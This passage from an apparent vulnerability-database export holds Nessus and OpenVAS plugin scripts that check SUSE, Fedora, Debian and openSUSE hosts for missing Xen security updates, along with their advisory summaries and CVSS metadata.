for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1027519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057493\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1072834\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1086107\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10471/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7550/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181177-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?69f36058\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-819=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/10\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-4.4.4_30-22.65.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-debugsource-4.4.4_30-22.65.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-doc-html-4.4.4_30-22.65.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-kmp-default-4.4.4_30_k3.12.61_52.125-22.65.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-kmp-default-debuginfo-4.4.4_30_k3.12.61_52.125-22.65.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.4.4_30-22.65.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-libs-4.4.4_30-22.65.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.4.4_30-22.65.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-4.4.4_30-22.65.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-tools-4.4.4_30-22.65.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.4.4_30-22.65.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-tools-domU-4.4.4_30-22.65.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"xen-tools-domU-debuginfo-4.4.4_30-22.65.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:15:49", "description": "update Xen page-table isolation (XPTI) mitigation and add Branch\nTarget Injection (BTI) mitigation for XSA-254 DoS via non-preemptable\nL3/L4 pagetable freeing [XSA-252] (#1549568) grant table v2 -> v1\ntransition may crash Xen [XSA-255] (#1549570) x86 PVH guest without\nLAPIC may DoS the host [XSA-256] (#1549572)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 16, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-03-21T00:00:00", "title": "Fedora 26 : xen (2018-0746dac335)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7540", "CVE-2018-7542", "CVE-2018-7541"], "modified": "2018-03-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-0746DAC335.NASL", "href": "https://www.tenable.com/plugins/nessus/108492", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-0746dac335.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108492);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-7540\", \"CVE-2018-7541\", \"CVE-2018-7542\");\n script_xref(name:\"FEDORA\", value:\"2018-0746dac335\");\n\n script_name(english:\"Fedora 26 : xen (2018-0746dac335)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"update Xen page-table isolation (XPTI) mitigation and add Branch\nTarget Injection (BTI) mitigation for XSA-254 DoS via non-preemptable\nL3/L4 pagetable freeing [XSA-252] (#1549568) grant table v2 -> v1\ntransition may crash Xen [XSA-255] (#1549570) x86 PVH guest without\nLAPIC may DoS the host [XSA-256] (#1549572)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-0746dac335\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"xen-4.8.3-3.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-02-01T01:51:54", "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor :\n\n - CVE-2018-7540\n Jann Horn discovered that missing checks in page table\n freeing may result in denial of service.\n\n - CVE-2018-7541\n Jan Beulich discovered that incorrect error handling in\n grant table checks may result in guest-to-host denial of\n service and potentially privilege escalation.\n\n - CVE-2018-7542\n Ian Jackson discovered that insufficient handling of x86\n PVH guests without local APICs may result in\n guest-to-host denial of service.", "edition": 26, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-03-05T00:00:00", "title": "Debian DSA-4131-1 : xen - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7540", "CVE-2018-7542", "CVE-2018-7541"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:xen", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4131.NASL", "href": "https://www.tenable.com/plugins/nessus/107123", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4131. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107123);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/11/13 12:30:46\");\n\n script_cve_id(\"CVE-2018-7540\", \"CVE-2018-7541\", \"CVE-2018-7542\");\n script_xref(name:\"DSA\", value:\"4131\");\n\n script_name(english:\"Debian DSA-4131-1 : xen - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in the Xen hypervisor :\n\n - CVE-2018-7540\n Jann Horn discovered that missing checks in page table\n freeing may result in denial of service.\n\n - CVE-2018-7541\n Jan Beulich discovered that incorrect error handling in\n grant table checks may result in guest-to-host denial of\n service and potentially privilege escalation.\n\n - CVE-2018-7542\n Ian Jackson discovered that insufficient handling of x86\n PVH guests without local APICs may result in\n guest-to-host denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-7540\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-7541\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-7542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/xen\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/xen\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4131\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the xen packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 4.8.3+comet2+shim4.10.0+comet3-1+deb9u5.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libxen-4.8\", reference:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libxen-dev\", reference:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libxenstore3.0\", reference:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-hypervisor-4.8-amd64\", reference:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-hypervisor-4.8-arm64\", reference:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-hypervisor-4.8-armhf\", reference:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-system-amd64\", reference:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-system-arm64\", reference:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-system-armhf\", reference:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-utils-4.8\", reference:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-utils-common\", reference:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xenstore-utils\", reference:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}}], "openvas": [{"lastseen": "2020-06-11T16:46:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-7542", "CVE-2018-7541", "CVE-2018-8897"], "description": "The remote host is missing an update for the ", "modified": "2020-06-09T00:00:00", "published": "2018-05-12T00:00:00", "id": "OPENVAS:1361412562310851742", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851742", "type": "openvas", "title": "openSUSE: Security Advisory for xen (openSUSE-SU-2018:1274-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851742\");\n script_version(\"2020-06-09T14:44:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 14:44:58 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:51:06 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-7540\", \"CVE-2018-7541\",\n \"CVE-2018-7542\", \"CVE-2018-8897\", \"CVE-2017-5754\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for xen (openSUSE-SU-2018:1274-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for xen to version 4.9.2 fixes several issues.\n\n This feature was added:\n\n - Added script, udev rule and systemd service to watch for vcpu\n online/offline events in a HVM domU. They are triggered via 'xl vcpu-set\n domU N'\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7540: x86 PV guest OS users were able to cause a denial of\n service (host OS CPU hang) via non-preemptible L3/L4 pagetable freeing\n (bsc#1080635).\n\n - CVE-2018-7541: Guest OS users were able to cause a denial of service\n (hypervisor crash) or gain privileges by triggering a grant-table\n transition from v2 to v1 (bsc#1080662).\n\n - CVE-2018-7542: x86 PVH guest OS users were able to cause a denial of\n service (NULL pointer dereference and hypervisor crash) by leveraging\n the mishandling\n of configurations that lack a Local APIC (bsc#1080634).\n\n These non-security issues were fixed:\n\n - bsc#1087252: Update built-in defaults for xenstored in stubdom, keep\n default to run xenstored as daemon in dom0\n\n - bsc#1087251: Preserve xen-syms from xen-dbg.gz to allow processing\n vmcores with crash(1)\n\n - bsc#1072834: Prevent unchecked MSR access error\n\n This update was imported from the SUSE:SLE-12-SP3:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-454=1\");\n\n script_tag(name:\"affected\", value:\"xen on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1274-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-05/msg00059.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7540", "CVE-2018-7542", "CVE-2018-7541"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310874189", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874189", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-c553a586c8", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_c553a586c8_xen_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-c553a586c8\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any 